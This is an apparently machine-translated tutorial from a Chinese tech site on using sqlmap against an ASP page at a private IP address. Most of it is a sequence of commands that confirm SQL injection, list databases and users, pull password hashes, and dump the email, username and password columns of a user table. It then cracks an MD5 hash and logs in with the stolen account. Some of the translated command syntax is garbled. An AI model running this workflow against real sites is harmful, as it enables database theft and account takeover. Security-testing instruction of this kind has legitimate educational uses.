Shulou(Shulou.com)05/31 Report--

This article mainly introduces the penetration testing tool sqlmap how to use, the article introduces in great detail, has a certain reference value, interested friends must read it!

First, check whether the injection point is available C:\ Python27\ sqlmap > python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"

Parameters:

-u: specify the injection point url

Display of injection results:

(1) the injection parameter id is GET injection, and there are four injection types: boolean-based blind, error-based, stacked queries and inline query.

(2) web server system is windows 2003 or XP

(3) web application technology is: ASP.NET, Microsoft IIS 6.0.

(4) Database type: SQLSERVER 2000

In figure 1, there are several query sentences, which require the user to enter [Ymax N]. If you are too lazy to enter or do not know how to enter, you can let the program enter automatically, just add a parameter, and the command is as follows:

C:\ Python27\ sqlmap > python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-- batch II.

All database names in the sqlserver can be exposed with a single command, as follows:

C:\ Python27\ sqlmap > python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-- dbs

Parameters:

There are two bars in front of the dbs:dbs. Please read them carefully.

The results show that the sqlserver contains a total of seven available databases.

3. The database currently used by web C:\ Python27\ sqlmap > python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-- current-db

4. Web database account C:\ Python27\ sqlmap > python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-- current-user

5. List all sqlserver users C:\ Python27\ sqlmap > python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-- users

6. Database account and password C:\ Python27\ sqlmap > python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-- passwords

7. List table C:\ Python27\ sqlmap > python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-- tables in the database.

Parameters:

-D: specify the database name

-- tables: list the table

A total of 34 tables were listed.

List the fields C:\ Python27\ sqlmap > python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-T userb-- columns in the table.

Parameters:

-D: specify the database name

-T: specify the table to list the fields

-- columns: specifies the listed field

The results show that the userb table contains 23 fields.

9. Content C:\ Python27\ sqlmap > python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-T userb-C" email,Username,userpassword "- dump

Parameters:

-C: specify the field to be stormed

-- dump: export the result

If there are too many fields, it takes a lot of time. You can specify to export a specific range of field contents, as follows:

C:\ Python27\ sqlmap > python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-T userb-C" email,Username,userpassword "- start 1-- stop 10-- dump

Parameters:

-- start: specify the starting line

-- stop: specify the ending line

The meaning of this command is to export the data contents of rows 1 to 10 in the fields (email,Username,userpassword) of the table userb in the database tourdata.

X. verification results

From the result of the above figure, we can see that one of the user information is:

Email:123456@qq.com

Username: 1.asp

Password: 49ba59abbe56e057

Through md5 decryption, the original password of the hash is 123456.

Let's test if we can log in when we get the account password.

Verified successfully!

The above is all the contents of this article entitled "how to use the Penetration testing tool sqlmap". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.